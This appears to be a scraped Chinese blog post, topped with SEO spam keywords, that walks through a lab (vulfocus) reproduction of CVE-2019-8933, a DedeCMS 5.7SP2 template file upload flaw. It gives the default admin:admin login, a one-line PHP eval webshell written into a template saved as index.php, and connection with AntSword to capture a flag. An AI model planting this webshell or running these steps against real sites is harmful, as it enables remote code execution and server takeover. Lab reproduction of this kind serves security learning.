北京档案馆网站建设,慢慢来 网站建设,淘宝seo推广优化,网站建设与管理专业找暑假工dedecms文件上传_CVE-2019-8933
漏洞信息
Desdev DedeCMS 5.7SP2版本中存在安全漏洞CVE-2019-8933文件上传漏洞
描述
Desdev DedeCMS#xff08;织梦内容管理系统#xff09;是中国卓卓网络#xff08;Desdev#xff09;公司的一套基于PHP的开源内容管理系统#x…dedecms文件上传_CVE-2019-8933
漏洞信息
Desdev DedeCMS 5.7SP2版本中存在安全漏洞CVE-2019-8933文件上传漏洞
描述
Desdev DedeCMS织梦内容管理系统是中国卓卓网络Desdev公司的一套基于PHP的开源内容管理系统CMS。该系统具有内容发布、内容管理、内容编辑和内容检索等功能。 Desdev DedeCMS 5.7SP2版本中存在安全漏洞。远程攻击者可通过在添加新模板时将文件名…/index.html更改成…/index.php利用该漏洞向uploads/目录上传.php文件并执行该文件。 后台路径/uploads/dede/ 后台密码admin:admin
前提 volfucs靶场复现 可以进入后台
复现过程
登录后台/uploads/dede
admin:admin新建模板 写入一句话木马
?php eval($_REQUEST[999]);?按照顺序找到更新主页 完成图中操作 点击浏览空白即为成功 使用蚁剑连接该页 获得flag
